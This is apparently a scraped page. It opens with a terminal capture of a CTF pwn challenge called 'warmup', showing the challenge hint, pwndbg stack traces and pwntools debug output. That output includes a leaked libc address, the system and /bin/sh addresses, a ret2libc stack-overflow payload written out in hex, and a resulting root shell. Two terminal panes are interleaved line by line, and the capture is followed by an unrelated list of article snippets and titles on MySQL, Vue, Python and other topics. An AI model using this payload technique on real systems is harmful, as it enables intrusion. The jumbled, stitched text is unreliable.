    00000150  70 72 6f 76  69 64 65 20  73 6f 6d 65  20 68 69 6e  │prov│ide │some│ hin│    │    ↓
    00000160  74 73 20 66  6f 72 20 62  65 67 69 6e  6e 65 72 73  │ts f│or b│egin│ners│    │   0x7fb52abaf2c9               sub    rsp, 8
    00000170  20 73 70 61  77 6e 69 6e  67 20 61 20  73 68 65 6c  │ spa│wnin│g a │shel│    │────────────────────────────────────────[ STACK ]─────────────────────────────────────────
    00000180  6c 20 74 6f  20 67 65 74  20 74 68 65  20 66 6c 61  │l to│ get│ the│ fla│    │00:0000│ rsp  0x7fff632836a8 —▸ 0x7fb52ab325e8 (_IO_file_underflow+328) ◂— cmp    rax, 0
    00000190  67 2e 0a 0a  31 2e 54 68  69 73 20 62  69 6e 61 72  │g.··│1.Th│is b│inar│    │01:0008│      0x7fff632836b0 —▸ 0x7fff632838e0 ◂— 0x1
    000001a0  79 20 68 61  73 20 6e 6f  20 53 53 50  28 53 74 61  │y ha│s no│ SSP│(Sta│    │02:0010│      0x7fff632836b8 —▸ 0x7fb52ae7c8e0 (_IO_2_1_stdin_) ◂— mov    esp, dword ptr [
    000001b0  63 6b 20 53  6d 61 73 68  20 50 72 6f  74 65 63 74  │ck S│mash│ Pro│tect│    │rax] /* 0xfbad208b */
    000001c0  69 6f 6e 29  2e 53 6f 20  79 6f 75 20  63 61 6e 20  │ion)│.So │you │can │    │03:0018│      0x7fff632836c0 —▸ 0x7fff63283700 ◂— 0x340
    000001d0  67 65 74 20  63 6f 6e 74  72 6f 6c 20  6f 66 20 69  │get │cont│rol │of i│    │04:0020│      0x7fff632836c8 —▸ 0x7fb52ab3360e (_IO_default_uflow+14) ◂— cmp    eax, -1
    000001e0  6e 73 74 72  75 63 74 69  6f 6e 20 70  6f 69 6e 74  │nstr│ucti│on p│oint│    │05:0028│      0x7fff632836d0 —▸ 0x7fb52ae7c8e0 (_IO_2_1_stdin_) ◂— mov    esp, dword ptr [
    000001f0  65 72 20 77  69 74 68 20  73 74 61 63  6b 20 6f 76  │er w│ith │stac│k ov│    │rax] /* 0xfbad208b */
    00000200  65 72 66 6c  6f 77 2e 0a  32 2e 4e 58  2d 62 69 74  │erfl│ow.·│2.NX│-bit│    │06:0030│      0x7fff632836d8 —▸ 0x7fb52ab26ee5 (gets+357) ◂— cmp    eax, -1
    00000210  20 69 73 20  64 69 73 61  62 6c 65 64  2e 20 59 6f  │ is │disa│bled│. Yo│    │07:0038│      0x7fff632836e0 ◂— 0x0
    00000220  75 20 63 61  6e 20 72 75  6e 20 79 6f  75 72 20 73  │u ca│n ru│n yo│ur s│    │──────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────
    00000230  68 65 6c 6c  63 6f 64 65  20 65 61 73  69 6c 79 2e  │hell│code│ eas│ily.│    │ ► f 0     7fb52abaf260 __read_nocancel+7
    00000240  0a 33 2e 50  49 45 28 50  6f 73 69 74  69 6f 6e 20  │·3.P│IE(P│osit│ion │    │   f 1     7fb52ab325e8 _IO_file_underflow+328
    00000250  49 6e 64 65  70 65 6e 64  65 6e 74 20  45 78 65 63  │Inde│pend│ent │Exec│    │   f 2     7fb52ab3360e _IO_default_uflow+14
    00000260  75 74 61 62  6c 65 29 20  69 73 20 61  6c 73 6f 20  │utab│le) │is a│lso │    │   f 3     7fb52ab26ee5 gets+357
    00000270  64 69 73 61  62 6c 65 64  2e 20 53 6f  6d 65 20 6d  │disa│bled│. So│me m│    │   f 4           40072c main+51
    00000280  65 6d 6f 72  79 20 61 64  64 72 65 73  73 65 73 20  │emor│y ad│dres│ses │    │   f 5     7fb52aad8830 __libc_start_main+240
    00000290  61 72 65 20  66 69 78 65  64 20 62 79  20 64 65 66  │are │fixe│d by│ def│    │pwndbg> c
    000002a0  61 75 6c 74  2e 0a 20 49  66 20 79 6f  75 20 67 65  │ault│.· I│f yo│u ge│    │Continuing.
    000002b0  74 20 73 74  75 63 6b 2c  20 77 65 20  72 65 63 6f  │t st│uck,│ we │reco│    │[New process 383]
    000002c0  6d 6d 65 6e  64 20 79 6f  75 20 74 6f  20 73 65 61  │mmen│d yo│u to│ sea│    │process 383 is executing new program: /bin/dash
    000002d0  72 63 68 20  61 62 6f 75  74 20 52 4f  50 20 61 6e  │rch │abou│t RO│P an│    │[New process 385]
    000002e0  64 20 78 36  34 2d 73 68  65 6c 6c 63  6f 64 65 2e  │d x6│4-sh│ellc│ode.│    │process 385 is executing new program: /bin/dash
    000002f0  0a 20 50 6c  65 61 73 65  20 70 77 6e  20 6d 65 3a  │· Pl│ease│ pwn│ me:│    │ls
    00000300  29 0a                                               │)·│                     │[New process 386]
    00000302                                                                               │process 386 is executing new program: /bin/ls
[*] leak: 0x7fb52ab27690                                                                   │[Thread debugging using libthread_db enabled]
[DEBUG] PLT 0x1f7f0 realloc                                                                │Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[DEBUG] PLT 0x1f800 __tls_get_addr                                                         │[Inferior 4 (process 386) exited normally]
[DEBUG] PLT 0x1f820 memalign                                                               │pwndbg> ls
[DEBUG] PLT 0x1f850 _dl_find_dso_for_object                                                │setting.sh  warmup  warmup.c  warmup.py
[DEBUG] PLT 0x1f870 calloc                                      
[DEBUG] PLT 0x1f8a0 malloc                                                                 │ 
[DEBUG] PLT 0x1f8a8 free                                                                   │   0x7fb52abaf2aa                         nop    word ptr [rax + rax]
[*] '/lib/x86_64-linux-gnu/libc.so.6'                                                      │   0x7fb52abaf2b0                  cmp    dword ptr [rip + 0x2d2489], 0 <0x7fb52ae8
    Arch:     amd64-64-little                                                              │1740>
    RELRO:    Partial RELRO                                                                │   0x7fb52abaf2b7                jne    write+25 <0x7fb52abaf2c9>
    Stack:    Canary found                                                                 │    ↓
    NX:       NX enabled                                                                   │   0x7fb52abaf2c9               sub    rsp, 8
    PIE:      PIE enabled                                                                  │────────────────────────────────────────[ STACK ]─────────────────────────────────────────
[*] libc_base: 0x7fb52aab8000                                                              │00:0000│ rsp  0x7fff632836a8 —▸ 0x7fb52ab325e8 (_IO_file_underflow+328) ◂— cmp    rax, 0
[*] system: 0x7fb52aafd390                                                                 │01:0008│      0x7fff632836b0 —▸ 0x7fff632838e0 ◂— 0x1
[*] binsh:0x7fb52ac44d57                                                                   │02:0010│      0x7fff632836b8 —▸ 0x7fb52ae7c8e0 (_IO_2_1_stdin_) ◂— mov    esp, dword ptr [
[DEBUG] Sent 0x129 bytes:                                                                  │rax] /* 0xfbad208b */
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│    │03:0018│      0x7fff632836c0 —▸ 0x7fff63283700 ◂— 0x340
    *                                                                                      │04:0020│      0x7fff632836c8 —▸ 0x7fb52ab3360e (_IO_default_uflow+14) ◂— cmp    eax, -1
    00000100  61 61 61 61  61 61 61 61  b3 07 40 00  00 00 00 00  │aaaa│aaaa│··@·│····│    │05:0028│      0x7fff632836d0 —▸ 0x7fb52ae7c8e0 (_IO_2_1_stdin_) ◂— mov    esp, dword ptr [
    00000110  57 4d c4 2a  b5 7f 00 00  46 07 40 00  00 00 00 00  │WM·*│····│F·@·│····│    │rax] /* 0xfbad208b */
    00000120  90 d3 af 2a  b5 7f 00 00  0a                        │···*│····│·│            │06:0030│      0x7fff632836d8 —▸ 0x7fb52ab26ee5 (gets+357) ◂— cmp    eax, -1
    00000129                                                                               │07:0038│      0x7fff632836e0 ◂— 0x0
[*] Switching to interactive mode                                                          │──────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────
[DEBUG] Received 0x10b bytes:                                                              │ ► f 0     7fb52abaf260 __read_nocancel+7
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│    │   f 1     7fb52ab325e8 _IO_file_underflow+328
    *                                                                                      │   f 2     7fb52ab3360e _IO_default_uflow+14
    00000100  61 61 61 61  61 61 61 61  b3 07 40                  │aaaa│aaaa│··@│          │   f 3     7fb52ab26ee5 gets+357
    0000010b                                                                               │   f 4           40072c main+51
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa│   f 5     7fb52aad8830 __libc_start_main+240
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa│pwndbg> c
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xb3\x07@│Continuing.
$ ls                                                                                       │[New process 383]
[DEBUG] Sent 0x3 bytes:                                                                    │process 383 is executing new program: /bin/dash
    'ls\n'                                                                                 │[New process 385]
[DEBUG] Received 0x28 bytes:                                                               │process 385 is executing new program: /bin/dash
    'setting.sh  warmup  warmup.c  warmup.py\n'                                            │ls
setting.sh  warmup  warmup.c  warmup.py                                                    │[New process 386]
$ id                                                                                       │process 386 is executing new program: /bin/ls
[DEBUG] Sent 0x3 bytes:                                                                    │[Thread debugging using libthread_db enabled]
    'id\n'                                                                                 │Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[DEBUG] Received 0x27 bytes:                                                               │[Inferior 4 (process 386) exited normally]
    'uid=0(root) gid=0(root) groups=0(root)\n'                                             │pwndbg> ls
uid=0(root) gid=0(root) groups=0(root)                                                     │setting.sh  warmup  warmup.c  warmup.py
$

你可能感兴趣的:(逆向,二进制,Re,python,网络安全,安全,系统安全,安全架构)

  • 【Python】一文详细介绍 py格式 文件 高斯小哥 Python基础【高质量合集】python新手入门学习
    【Python】一文详细介绍py格式文件个人主页:高斯小哥高质量专栏:Matplotlib之旅:零基础精通数据可视化、Python基础【高质量合集】、PyTorch零基础入门教程希望得到您的订阅和支持~创作高质量博文(平均质量分92+),分享更多关于深度学习、PyTorch、Python领域的优质内容!(希望得到您的关注~)文章目录一、py格式文件简介二、如何创建和编辑py格式文件三、如何运行py
  • python抓包与解包_Python—网络抓包与解包(pcap、dpkt) weixin_39691055 python抓包与解包
    pcap安装[root@localhost~]#pipinstallpypcap抓包与解包#-*-coding:utf-8-*-importpcap,dpktimportre,threading,requests__black_ip=['103.224.249.123','203.66.1.212']#抓包:param1eth_name网卡名,如:eth0,eth3。param2p_type日志捕
  • Flink中的SQL Client和SQL Gateway BigDataMLApplication flinkflinksqlgateway
    Flink中的SQLClient和SQLGateway对比目录定义基本原理适用场景主要区别常用运维命令示例官方链接正文1.定义SQLClient:FlinkSQLClient是一种用于提交和执行FlinkSQL语句的命令行界面或图形界面工具。SQLGateway:FlinkSQLGateway是一个独立的服务,它允许客户端通过RESTfulAPI将SQL查询提交到Flink集群。2.基本原理SQL
  • 打印出1-100的奇数 。(C语言) 王多鱼001 C语言c语言算法数据结构
    代码:#includeintmain(){for(inti=1;i<101;i++){if(i%2==1){printf("%d,",i);}}return0;}
  • 通俗易懂:MySQL中如何设置只读实例并确保数据一致性? 大龄下岗程序员 mysqljavamysqlspring
    在MySQL中设置只读实例主要应用于构建高可用性和扩展性的数据库环境,通常是为了分担读取负载或者用于备份和灾难恢复。以下是创建MySQL只读实例并确保数据一致性的基本步骤:1.创建并配置只读实例-主从复制设置-首先,你需要有一个主数据库实例(Master)负责接收所有的写操作。-创建一个或多个从数据库实例(Slave),并将它们配置为主数据库的复制品。这通常通过设置主从复制(Replication
  • 下载Android源码 赛非斯
    repoinit-uhttps://mirrors.tuna.tsinghua.edu.cn/git/AOSP/platform/manifest-bandroid-10.0.0_r411.首先下载repo:a)终端运行gitclonegit://codeaurora.org/tools/repo.gitb)mkdir~/binc)拷贝repo到~/bin下面,修改repo权限,chmoda+x~
  • 华为OD机试 - 单向链表中间节点(Java & JS & Python & C & C++) 华为OD题库 华为od链表java
    须知哈喽,本题库完全免费,收费是为了防止被爬,大家订阅专栏后可以私信联系退款。感谢支持文章目录须知题目描述输出描述解析代码题目描述给定一个单链表L,请编写程序输出L中间结点保存的数据。如果有两个中间结点,则输出第二个中间结点保存的数据。例如:给定L为1→7→5,则输出应该为7;给定L为1→2→3→4,则输出应该为3;输入描述每个输入包含1个测试用例。每个测试用例:第一行给出链表首结点的地址、结点总
  • 信任 饮冰伊乔
    随着社会的发展,微信和支付宝交易给人们带来了极大的方便,越来越多的人出门都只选择拿一部手机即可,方便安全,可昨天我就遇到了一件比较尴尬的事。昨天傍晚,我从公司出来,感觉有点饿,决定索性吃了饭再回去,来到去过几次的一个店里,如往常一样叫了餐,当时店里吃饭的不多,老板麻利的先去做了,正要扫微信付账的时候发现手机没电了,迷之尴尬,我只好跟老板说不用做了,手机没电了,我身上又没现金,付不了帐了。老板娘很热
  • php 把一个数组分成有n个元素的二维数组的算法 风清扬-独孤九剑 phpphp算法
    一、第一种解法0){$columns_map[$position]++;//这个地方格外注意,$position与$columns比较$position=($position<$columns-1)?++$position:0;$array_length--;}foreach($columns_mapas$val){$newarray[]=array_splice($array,0,$val);}
  • llama.cpp 编译安装@Ubuntu skywalk8163 项目实践人工智能llamaubuntulinux人工智能
    在Kylin和Ubuntu编译llama.cpp,具体参考:llama模型c语言推理@FreeBSD-CSDN博客现在代码并编译:gitclonehttps://github.com/ggerganov/llama.cppcdllama.cppmkdirbuildcdbuildcmake..cmake--build.--configRelease#可选安装makeinstall#或可选添加路径ex
  • python 推导式(派生、衍生) sanduo112 人工智能pythonwindows开发语言
    python推导式一、推导式(派生、衍生)1.Python推导式是一种独特的数据处理方式,可以从一个数据序列构建另一个新的数据序列的结构体。2.列表(list)推导式3.字典(dict)推导式4.集合(set)推导式5.元组(tuple)推导式二、代码概述一、推导式(派生、衍生)1.Python推导式是一种独特的数据处理方式,可以从一个数据序列构建另一个新的数据序列的结构体。Python支持各种数
  • SpringMVC设置全局异常处理器 水岸齐天 javaspring
    文章目录背景分析使用@ControllerAdvice(@RestControllerAdvice)+@ExceptionHandler实现全局异常全局异常处理-多个处理器匹配顺序存在一个类中存在不同的类中对于过滤器和拦截器中的异常,有两种思路可以考虑背景在项目中我们有需求做一个全局异常处理,来规范所有出去的异常信息。参考:官方文档分析首先ControllerAdvice(RestControll
  • 以前开发MFC界面如何快速转成QT界面 广州视觉芯软件有限公司 mfcqtc++
    将MFC界面快速转换为Qt界面可能需要进行一些手动工作,因为MFC和Qt是两个不同的界面框架,它们具有不同的设计和实现原理。但是,以下步骤可以帮助你快速进行转换:创建一个新的Qt项目:使用QtCreator创建一个新的Qt项目。分析MFC界面:仔细分析你的MFC界面,包括窗口、对话框、控件等的布局、样式和行为。重新设计界面:使用Qt的可视化设计器重新设计界面。在QtCreator的设计器中,你可以
  • 数据挖掘|数据预处理|基于Python的数据标准化方法 皖山文武 数据挖掘数据建模与分析python数据挖掘开发语言
    基于Python的数据标准化方法1.z-score方法2.极差标准化方法3.最大绝对值标准化方法在数据分析之前,通常需要先将数据标准化(Standardization),利用标准化后的数据进行数据分析,以避免属性之间不同度量和取值范围差异造成数据对分析结果的影响。1.z-score方法Z-score方法是基于原始数据的均值和标准差来进行数据标准化的,处理后的数据均值为0,方差为1,符合标准正态分布
  • C++学习笔记(lambda函数) __TAT__ C&C++c++学习笔记
    C++learningnote1、lambda函数的语法2、lambda函数的几种用法1、lambda函数的语法lambda函数的一般语法如下:[capture_clause](parameters)->return_type{function_body}capture_clause:需要捕获的变量,但要求该变量必须在这个作用域中。通常的捕获方式有以下几种:[]:不捕获任何变量[&]:按引用捕获变
  • 使用多线程的方式模拟高并发请求接口,用于自测接口的稳定性【项目】 还算善良_ 私有代码库工具类javalist数据结构
    packagecom.gitee.taven.test;importcom.gitee.taven.ApiResult;importcom.gitee.taven.aop.RepeatSubmitAspect;importorg.slf4j.Logger;importorg.slf4j.LoggerFactory;importorg.springframework.beans.factory.an
  • 为千 佩蓉:为家庭放弃事业的男人没出息吗? 北京朵多教育
    为家庭放弃事业的男人没出息吗我们在搭档的过程中会遇到一些问题,因此要做好心理准备,这样才不会陷入抱怨或双输的局面。关键不是谁比谁能力强,而是夫妻之间如何取长补短。家庭要赢需要每个人的付出和牺牲,大家一起分担和负责,这样才能享受相爱的自由、安全和归属感。我们需要做的牺牲包括自己的时间、自己的一些爱好,甚至事业发展。为千认为做好父亲是非常重要的事,所以他不仅要出席在孩子们的生活中,还要积极地参与和带领
  • CSV指南:Python程序获取大型CSV文件行数 孤独打铁匠Julian 笔记经验分享python
    本指南提供了几种使用Python来获取大型CSV文件行数的方法,并解释了每种方法的适用场景。方法1:使用csv.reader处理复杂CSV文件当你的CSV文件中包含多行字段(即某些字段的值中包含换行符)时,使用csv.reader是一个可靠的选择,因为它能够正确处理这些复杂情况。这个方法适用于大多数大小的CSV文件,但是对于非常大的文件,读取整个文件可能会占用较多的时间和内存。对于极大的文件,考虑
  • matlab按行读取txt文件数据集 地上悬河 matlab开发语言
    功能:使用Matlab按行读取txt文件,按照特定符号进行分割后加入数组中fid=fopen('coordinate.txt');%首先打开文本文件coordinate.txttemp=[]while~feof(fid)%while循环表示文件指针没到达末尾,则继续%每次读取一行,str是字符串格式str=fgetl(fid);%以','作为分割数据的字符,结果为cell数组s=regexp(st
  • 用XMLHttpRequest发送和接收JSON数据 潭池先生 jsonXMLHttpRequest前端
    百度的AI回答了一个案例:varxhr=newXMLHttpRequest();varurl="your_endpoint_url";//替换为你的API端点vardata=JSON.stringify({key1:"value1",key2:"value2"});xhr.open("POST",url,true);xhr.setRequestHeader("Content-Type","appl
  • yarn的安装和使用全网最详细教程 zxj19880502 yarnnpm
    一、yarn的简介:Yarn是facebook发布的一款取代npm的包管理工具。二、yarn的特点:速度超快。Yarn缓存了每个下载过的包,所以再次使用时无需重复下载。同时利用并行下载以最大化资源利用率,因此安装速度更快。超级安全。在执行代码之前,Yarn会通过算法校验每个安装包的完整性。超级可靠。使用详细、简洁的锁文件格式和明确的安装算法,Yarn能够保证在不同系统上无差异的工作。三、yarn的
  • 请简单介绍一下Shiro框架是什么?Shiro在Java安全领域的主要作用是什么?Shiro主要提供了哪些安全功能? AaronWang94 shirojavajava安全开发语言
    请简单介绍一下Shiro框架是什么?Shiro框架是一个强大且灵活的开源安全框架,为Java应用程序提供了全面的安全解决方案。它主要用于身份验证、授权、加密和会话管理等功能,可以轻松地集成到任何JavaWeb应用程序中,并提供了易于理解和使用的API,使开发人员能够快速实现安全特性。Shiro的核心组件包括Subject、SecurityManager和Realms。Subject代表了当前与应用
  • Redis和MySQL的数据一致性问题思考 爱放火的安小妮 RedisMySQL思考总结redismysql数据库
    Redis和MySQL的数据一致性问题思考最近有在反思自己工作。因为自己这边是面向业务的,而且是和商品数据相关的。所以我平时工作中涉及到的最多的就是MySQL和Redis的数据存储。像我们配置商品是把商品配置到MySQL,但是对外toC接口都是直接读取Redis的。所以自然而然就涉及到MySQL和Redis的数据一致性问题。下面就是聊聊我自己对于这个问题的一个思考吧。有问题或者有更好方案的朋友也希
  • 【转载】SSD测试第一神器——FIO running_sheep
    转自:[http://www.ssdfans.com]对于SSD性能测试来说,最好的工具莫过于FIO了。FIO是Jens开发的一个开源测试工具,功能非常强大,本文就只介绍其中一些基本功能。线程,队列深度,Offset,同步异步,DirectIO,BIO使用FIO之前,首先要有一些SSD性能测试的基础知识。线程指的是同时有多少个读或写任务在并行执行,一般来说,CPU里面的一个核心同一时间只能运行一个
  • 谷歌浏览器驱动Chromedriver(114-120版本)文件以及驱动下载教程 pigerr杨 Pythonpythonchromedrivers
    ChromeDriver官方网站GitHub||GoogleChromeLabs/chrome-for-testingChromeDriver113-125_JSONChromeforTestingavailability123-125zip白月黑羽Python基础|进阶|Qt图形界面|Django|自动化测试|性能测试|JS语言|JS前端|原理与安装
  • 大创项目推荐 深度学习 opencv python 公式识别(图像识别 机器视觉) laafeer python
    文章目录0前言1课题说明2效果展示3具体实现4关键代码实现5算法综合效果6最后0前言优质竞赛项目系列,今天要分享的是基于深度学习的数学公式识别算法实现该项目较为新颖,适合作为竞赛课题方向,学长非常推荐!学长这里给一个题目综合评分(每项满分5分)难度系数:3分工作量:4分创新点:4分更多资料,项目分享:https://gitee.com/dancheng-senior/postgraduate1课题
  • vue 通信方式 hx_1199 vue.js前端
    1、props和$emit父组件向子组件传递数据是通过props传递的,子组件传递给父组件是通过$emit触发事件来做到的。父组件this.$emit("update:page",newVal)-->importChildfrom'./child'exportdefault{name:"Father",components:{Child,},data(){return{articleList:['
  • docker怎么端口映射 Lance_mu docker容器运维
    1、默认固定的端口#Web服务器:WebApache或Nginx通常使用80端口HTTP:80HTTPS:443#数据库服务器MySQL:3306PostgreSQL:5432MongoDB:27017Redis:6379#邮件服务器SMTP:25POP3:110IMAP:143#其他服务SSH:22FTP:21DNS(域名解析):53代理服务器Squid:3128版本控制系统Git:9418(S
  • 网络安全(黑客)——自学2024 小言同学喜欢挖漏洞 web安全安全网络学习网络安全信息安全渗透测试
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 黑客(网络安全)技术自学30天 一个迷人的黑客 web安全安全网络笔记网络安全信息安全渗透测试
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 遍历dom 并且存储(将每一层的DOM元素存在数组中) 换个号韩国红果果 JavaScripthtml
    数组从0开始!! var a=[],i=0; for(var j=0;j<30;j++){ a[j]=[];//数组里套数组,且第i层存储在第a[i]中 } function walkDOM(n){ do{ if(n.nodeType!==3)//筛选去除#text类型 a[i].push(n); //con
  • Android+Jquery Mobile学习系列(9)-总结和代码分享 白糖_ JQuery Mobile
    目录导航   经过一个多月的边学习边练手,学会了Android基于Web开发的毛皮,其实开发过程中用Android原生API不是很多,更多的是HTML/Javascript/Css。   个人觉得基于WebView的Jquery Mobile开发有以下优点: 1、对于刚从Java Web转型过来的同学非常适合,只要懂得HTML开发就可以上手做事。 2、jquerym
  • impala参考资料 dayutianfei impala
    记录一些有用的Impala资料   1. 入门资料 >>官网翻译:     http://my.oschina.net/weiqingbin/blog?catalog=423691   2. 实用进阶 >>代码&架构分析:     Impala/Hive现状分析与前景展望:http
  • JAVA 静态变量与非静态变量初始化顺序之新解 周凡杨 java静态非静态顺序
    今天和同事争论一问题,关于静态变量与非静态变量的初始化顺序,谁先谁后,最终想整理出来!测试代码: import java.util.Map; public class T { public static T t = new T(); private Map map = new HashMap(); public T(){ System.out.println(&quo
  • 跳出iframe返回外层页面 g21121 iframe
    在web开发过程中难免要用到iframe,但当连接超时或跳转到公共页面时就会出现超时页面显示在iframe中,这时我们就需要跳出这个iframe到达一个公共页面去。 首先跳转到一个中间页,这个页面用于判断是否在iframe中,在页面加载的过程中调用如下代码: <script type="text/javascript"> //<!-- function
  • JAVA多线程监听JMS、MQ队列 510888780 java多线程
    背景:消息队列中有非常多的消息需要处理,并且监听器onMessage()方法中的业务逻辑也相对比较复杂,为了加快队列消息的读取、处理速度。可以通过加快读取速度和加快处理速度来考虑。因此从这两个方面都使用多线程来处理。对于消息处理的业务处理逻辑用线程池来做。对于加快消息监听读取速度可以使用1.使用多个监听器监听一个队列;2.使用一个监听器开启多线程监听。 对于上面提到的方法2使用一个监听器开启多线
  • 第一个SpringMvc例子 布衣凌宇 spring mvc
    第一步:导入需要的包; 第二步:配置web.xml文件 <?xml version="1.0" encoding="UTF-8"?> <web-app version="2.5" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:xsi=
  • 我的spring学习笔记15-容器扩展点之PropertyOverrideConfigurer aijuans Spring3
    PropertyOverrideConfigurer类似于PropertyPlaceholderConfigurer,但是与后者相比,前者对于bean属性可以有缺省值或者根本没有值。也就是说如果properties文件中没有某个bean属性的内容,那么将使用上下文(配置的xml文件)中相应定义的值。如果properties文件中有bean属性的内容,那么就用properties文件中的值来代替上下
  • 通过XSD验证XML antlove xmlschemaxsdvalidationSchemaFactory
    1. XmlValidation.java package xml.validation; import java.io.InputStream; import javax.xml.XMLConstants; import javax.xml.transform.stream.StreamSource; import javax.xml.validation.Schem
  • 文本流与字符集 百合不是茶 PrintWrite()的使用字符集名字 别名获取
    文本数据的输入输出;           输入;数据流,缓冲流         输出;介绍向文本打印格式化的输出PrintWrite();   package 文本流; import java.io.FileNotFound
  • ibatis模糊查询sqlmap-mapping-**.xml配置 bijian1013 ibatis
            正常我们写ibatis的sqlmap-mapping-*.xml文件时,传入的参数都用##标识,如下所示: <resultMap id="personInfo" class="com.bijian.study.dto.PersonDTO"> <res
  • java jvm常用命令工具——jdb命令(The Java Debugger) bijian1013 javajvmjdb
            用来对core文件和正在运行的Java进程进行实时地调试,里面包含了丰富的命令帮助您进行调试,它的功能和Sun studio里面所带的dbx非常相似,但 jdb是专门用来针对Java应用程序的。         现在应该说日常的开发中很少用到JDB了,因为现在的IDE已经帮我们封装好了,如使用ECLI
  • 【Spring框架二】Spring常用注解之Component、Repository、Service和Controller注解 bit1129 controller
    在Spring常用注解第一步部分【Spring框架一】Spring常用注解之Autowired和Resource注解(http://bit1129.iteye.com/blog/2114084)中介绍了Autowired和Resource两个注解的功能,它们用于将依赖根据名称或者类型进行自动的注入,这简化了在XML中,依赖注入部分的XML的编写,但是UserDao和UserService两个bea
  • cxf wsdl2java生成代码super出错,构造函数不匹配 bitray super
        由于过去对于soap协议的cxf接触的不是很多,所以遇到了也是迷糊了一会.后来经过查找资料才得以解决. 初始原因一般是由于jaxws2.2规范和jdk6及以上不兼容导致的.所以要强制降为jaxws2.1进行编译生成.我们需要少量的修改: 我们原来的代码 wsdl2java com.test.xxx -client http://..... 修改后的代
  • 动态页面正文部分中文乱码排障一例 ronin47
    公司网站一部分动态页面,早先使用apache+resin的架构运行,考虑到高并发访问下的响应性能问题,在前不久逐步开始用nginx替换掉了apache。 不过随后发现了一个问题,随意进入某一有分页的网页,第一页是正常的(因为静态化过了);点“下一页”,出来的页面两边正常,中间部分的标题、关键字等也正常,唯独每个标题下的正文无法正常显示。 因为有做过系统调整,所以第一反应就是新上
  • java-54- 调整数组顺序使奇数位于偶数前面 bylijinnan java
    import java.util.Arrays; import java.util.Random; import ljn.help.Helper; public class OddBeforeEven { /** * Q 54 调整数组顺序使奇数位于偶数前面 * 输入一个整数数组,调整数组中数字的顺序,使得所有奇数位于数组的前半部分,所有偶数位于数组的后半
  • 从100PV到1亿级PV网站架构演变 cfyme 网站架构
    一个网站就像一个人,存在一个从小到大的过程。养一个网站和养一个人一样,不同时期需要不同的方法,不同的方法下有共同的原则。本文结合我自已14年网站人的经历记录一些架构演变中的体会。 1:积累是必不可少的 架构师不是一天练成的。 1999年,我作了一个个人主页,在学校内的虚拟空间,参加了一次主页大赛,几个DREAMWEAVER的页面,几个TABLE作布局,一个DB连接,几行PHP的代码嵌入在HTM
  • [宇宙时代]宇宙时代的GIS是什么? comsci Gis
           我们都知道一个事实,在行星内部的时候,因为地理信息的坐标都是相对固定的,所以我们获取一组GIS数据之后,就可以存储到硬盘中,长久使用。。。但是,请注意,这种经验在宇宙时代是不能够被继续使用的          宇宙是一个高维时空
  • 详解create database命令 czmmiao database
    完整命令 CREATE DATABASE mynewdb   USER SYS IDENTIFIED BY sys_password   USER SYSTEM IDENTIFIED BY system_password   LOGFILE GROUP 1 ('/u01/logs/my/redo01a.log','/u02/logs/m
  • 几句不中听却不得不认可的话 datageek
    1、人丑就该多读书。 2、你不快乐是因为:你可以像猪一样懒,却无法像只猪一样懒得心安理得。 3、如果你太在意别人的看法,那么你的生活将变成一件裤衩,别人放什么屁,你都得接着。 4、你的问题主要在于:读书不多而买书太多,读书太少又特爱思考,还他妈话痨。 5、与禽兽搏斗的三种结局:(1)、赢了,比禽兽还禽兽。(2)、输了,禽兽不如。(3)、平了,跟禽兽没两样。结论:选择正确的对手很重要。 6
  • 1 14:00 PHP中的“syntax error, unexpected T_PAAMAYIM_NEKUDOTAYIM”错误 dcj3sjt126com PHP
    原文地址:http://www.kafka0102.com/2010/08/281.html   因为需要,今天晚些在本机使用PHP做些测试,PHP脚本依赖了一堆我也不清楚做什么用的库。结果一跑起来,就报出类似下面的错误:“Parse error: syntax error, unexpected T_PAAMAYIM_NEKUDOTAYIM in /home/kafka/test/
  • xcode6 Auto layout and size classes dcj3sjt126com ios
    官方GUI   https://developer.apple.com/library/ios/documentation/UserExperience/Conceptual/AutolayoutPG/Introduction/Introduction.html   iOS中使用自动布局(一)   http://www.cocoachina.com/ind
  • 通过PreparedStatement批量执行sql语句【sql语句相同,值不同】 梦见x光 sql事务批量执行
    比如说:我有一个List需要添加到数据库中,那么我该如何通过PreparedStatement来操作呢? public void addCustomerByCommit(Connection conn , List<Customer> customerList) {    String sql = "inseret into customer(id
  • 程序员必知必会----linux常用命令之十【系统相关】 hanqunfeng Linux常用命令
